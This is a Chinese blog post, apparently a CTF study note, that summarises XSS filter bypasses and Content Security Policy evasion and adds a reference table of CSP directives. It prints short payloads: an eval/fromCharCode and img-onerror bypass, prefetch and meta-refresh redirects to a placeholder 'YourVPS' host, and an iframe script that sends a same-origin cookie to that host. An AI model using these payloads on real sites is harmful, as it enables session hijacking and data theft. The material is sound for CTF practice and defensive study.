<!DOCTYPE html>
<html lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="T3stzer0">


    <meta name="subtitle" content="思考">




<title>XSS题技巧总结-不定期更新 | T3stzer0&#39;s Blog</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    


</head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">Home</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">Home</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>

<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/highlightjs/cdn-release@11.5.1/build/styles/default.min.css">
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>

        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
			expand_toc()
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">XSS题技巧总结-不定期更新</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">T3stzer0</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">九月 28, 2017&nbsp;&nbsp;19:59:00</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/category/CTF/">CTF</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <p><img src="/2017/09/28/XSS题技巧总结-不定期更新/5-29.jpg" alt=""></p>
<a id="more"></a>
<h1 id="一般绕过"><a class="markdownIt-Anchor" href="#一般绕过"></a> 一般绕过</h1>
<p>1、检测 alert :<br>
如 preg_match(&quot;\alert\i&quot;,$var);<br>
Bypass:</p>
<pre class="highlight"><code class="javascript">	<span class="built_in">eval</span>(<span class="built_in">String</span>.fromCharCode(<span class="number">97</span>，<span class="number">108</span>,<span class="number">101</span>,<span class="number">114</span>,<span class="number">116</span>,<span class="number">40</span>,<span class="number">41</span>))
</code></pre>
<p>2、检测 script:<br>
如 preg_match(&quot;\script\i&quot;,$var);<br>
Bypass:</p>
<pre class="highlight"><code class="javascript">	&lt;img src=<span class="string">""</span> onerror=<span class="string">"alert(1)"</span>&gt;
</code></pre>
<p>3、用preg_macth()检测可以用数组传参绕过</p>
<h1 id="csp绕过"><a class="markdownIt-Anchor" href="#csp绕过"></a> CSP绕过</h1>
<h2 id="cspcontent-security-policy内容安全策略"><a class="markdownIt-Anchor" href="#cspcontent-security-policy内容安全策略"></a> CSP(Content Security Policy)内容安全策略</h2>
<p><em><strong>科普在后面</strong></em></p>
<h4 id="同源策略-default-srcself"><a class="markdownIt-Anchor" href="#同源策略-default-srcself"></a> 同源策略 default-src:“self”</h4>
<p><strong>谷歌</strong></p>
<pre class="highlight"><code class="javascript">&lt;meta http-equiv=<span class="string">"refresh"</span> content=<span class="string">"0;url=http://YourVPS"</span>&gt;  
<span class="xml"><span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">"prerender"</span> <span class="attr">href</span>=<span class="string">"http://YourVPS"</span>&gt;</span>
</span></code></pre>
<p><strong>火狐</strong></p>
<pre class="highlight"><code class="javascript">&lt;meta http-equiv=<span class="string">"refresh"</span> content=<span class="string">"0;url=http://YourVPS"</span>&gt;  
<span class="xml"><span class="tag">&lt;<span class="name">link</span> <span class="attr">rel</span>=<span class="string">"prefetch"</span> <span class="attr">href</span>=<span class="string">"http://YourVPS"</span>&gt;</span> 
</span></code></pre>
<blockquote>
<p>meta标签的http-equiv=“refresh”</p>
<ul>
<li>刷新、跳转页面</li>
</ul>
</blockquote>
<blockquote>
<p>content中的0</p>
<ul>
<li>多少秒跳转</li>
</ul>
</blockquote>
<blockquote>
<p>link标签的 rel=“prefetch”</p>
<ul>
<li>预缓存</li>
</ul>
</blockquote>
<h4 id="利用iframe获取同域cookie"><a class="markdownIt-Anchor" href="#利用iframe获取同域cookie"></a> 利用iframe获取同域cookie</h4>
<pre class="highlight"><code class="javascript">&lt;script&gt;
	<span class="keyword">var</span> iframe = <span class="built_in">document</span>.createElement(<span class="string">"iframe"</span>);
	iframe.name=<span class="string">"Testzero"</span>;
	iframe.src=<span class="string">"同域站点"</span><span class="comment">//敏感目录</span>
	<span class="built_in">document</span>.body.appendChild(iframe);
	location.href=<span class="string">"http://YourVPS?cookie="</span>+<span class="built_in">escape</span>(Testzero.window.document.cookie);
<span class="xml"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span>
</code></pre>
<h3 id="用法"><a class="markdownIt-Anchor" href="#用法"></a> 用法：</h3>
<blockquote>
<ul>
<li>Content-Security-Policy： 策略内的进行规定的进行相应的阻止</li>
<li>Content-Security-Policy-Report-Only： 只报告不阻止</li>
</ul>
</blockquote>
<h3 id="键说明"><a class="markdownIt-Anchor" href="#键说明"></a> 键说明</h3>
<table>
<thead>
<tr>
<th>Key</th>
<th>取值示例</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>default-src</td>
<td>‘self’ <a href="http://xxx.example.com" target="_blank" rel="noopener">xxx.example.com</a></td>
<td>定义针对所有类型（js/image/css/web font/ajax/iframe/多媒体等）资源的默认加载策略，某类型资源如果没有单独定义策略，就使用默认。</td>
</tr>
<tr>
<td>script-src</td>
<td>‘self’ <a href="http://js.example.com" target="_blank" rel="noopener">js.example.com</a></td>
<td>定义针对JavaScript的加载策略</td>
</tr>
<tr>
<td>object-src</td>
<td>‘self’</td>
<td>针对, 等标签的加载策略</td>
</tr>
<tr>
<td>style-src</td>
<td>‘self’ <a href="http://css.example.com" target="_blank" rel="noopener">css.example.com</a></td>
<td>定义针对样式的加载策略</td>
</tr>
<tr>
<td>img-src</td>
<td>‘self’ <a href="http://image.example.com" target="_blank" rel="noopener">image.example.com</a></td>
<td>定义针对图片的加载策略</td>
</tr>
<tr>
<td>media-src</td>
<td>‘<a href="http://media.example.com" target="_blank" rel="noopener">media.example.com</a>’</td>
<td>针对或者引入的html多媒体等标签的加载策略</td>
</tr>
<tr>
<td>frame-src</td>
<td>‘self’</td>
<td>针对iframe的加载策略</td>
</tr>
<tr>
<td>connect-src</td>
<td>‘self’</td>
<td>针对Ajax、WebSocket等请求的加载策略。不允许的情况下，浏览器会模拟一个状态为400的响应</td>
</tr>
<tr>
<td>font-src</td>
<td><a href="http://font.qq.com" target="_blank" rel="noopener">font.qq.com</a></td>
<td>针对Web Font的加载策略</td>
</tr>
<tr>
<td>sandbox</td>
<td>allow-forms allow-scripts</td>
<td>对请求的资源启用sandbox</td>
</tr>
<tr>
<td>report-uri</td>
<td>/some-report-uri</td>
<td>告诉浏览器如果请求的资源不被策略允许时，往哪个地址提交日志信息。不阻止任何内容，可以改用Content-Security-Policy-Report-Only头</td>
</tr>
<tr>
<td>base-uri</td>
<td>‘self’</td>
<td>限制当前页面的url（CSP2）</td>
</tr>
<tr>
<td>child-src</td>
<td>‘self’</td>
<td>限制子窗口的源(iframe、弹窗等),取代frame-src（CSP2）</td>
</tr>
<tr>
<td>form-action</td>
<td>‘self’</td>
<td>限制表单能够提交到的源（CSP2）</td>
</tr>
<tr>
<td>frame-ancestors</td>
<td>‘none’</td>
<td>限制了当前页面可以被哪些页面以iframe,frame,object等方式加载（CSP2）</td>
</tr>
<tr>
<td>plugin-types</td>
<td>application/pdf</td>
<td>限制插件的类型（CSP2）</td>
</tr>
</tbody>
</table>
<h3 id="值说明"><a class="markdownIt-Anchor" href="#值说明"></a> 值说明</h3>
<table>
<thead>
<tr>
<th>Value</th>
<th>示例</th>
<th>说明</th>
</tr>
</thead>
<tbody>
<tr>
<td>*</td>
<td>img-src *</td>
<td>允许任何内容</td>
</tr>
<tr>
<td>‘none’</td>
<td>img-src ‘none’</td>
<td>不允许任何内容</td>
</tr>
<tr>
<td>‘self’</td>
<td>img-src ‘self’</td>
<td>允许同源内容</td>
</tr>
<tr>
<td>data:</td>
<td>img-src data:</td>
<td>允许data:协议（如base64编码的图片）</td>
</tr>
<tr>
<td><a href="http://www.a.com" target="_blank" rel="noopener">www.a.com</a></td>
<td>img-src <a href="http://www.a.com" target="_blank" rel="noopener">www.a.com</a></td>
<td>允许加载指定域名的资源</td>
</tr>
<tr>
<td>*.a.com</td>
<td>img-src *.a.com</td>
<td>允许加载a.com任何子域的资源</td>
</tr>
<tr>
<td><a href="https://img.com" target="_blank" rel="noopener">https://img.com</a></td>
<td>img-srchttps://img.com</td>
<td>允许加载img.com的https资源</td>
</tr>
<tr>
<td>https:</td>
<td>img-src https:</td>
<td>允许加载https资源</td>
</tr>
<tr>
<td>‘unsafe-inline’</td>
<td>script-src ‘unsafe-inline’</td>
<td>允许加载inline资源（style属性，onclick，inline js和inline css等等）</td>
</tr>
<tr>
<td>‘unsafe-eval’</td>
<td>script-src ‘unsafe-eval’</td>
<td>允许加载动态js代码，例如eval()</td>
</tr>
</tbody>
</table>
<blockquote>
<p>以上表格引用自<a href="http://web.jobbole.com/86409/" target="_blank" rel="noopener">伯乐在线</a></p>
</blockquote>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>T3stzer0</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://www.testzero-wz.com/2017/09/28/XSS题技巧总结-不定期更新/">https://www.testzero-wz.com/2017/09/28/XSS题技巧总结-不定期更新/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tag/CTF/"># CTF</a>
                    
                        <a href="/tag/XSS/"># XSS</a>
                    
                        <a href="/tag/WEB/"># WEB</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2017/09/29/滴滴实习生面经/">滴滴实习生面经</a>
            
            
            <a class="next" rel="next" href="/2017/09/27/Pwnable-kr-Passcode/">Pwnable.kr--Passcode</a>
            
        </section>


    </article>
</div>

        </div>
        <!-- 
<footer id="footer" class="footer">
    <div class="copyright">
        <span>© T3stzer0 | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

-->
<script src="/js/highlight.min.js"></script>
<script>hljs.highlightAll();</script>

    </div>
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-MML-AM_CHTML"></script>
</body>
</html>
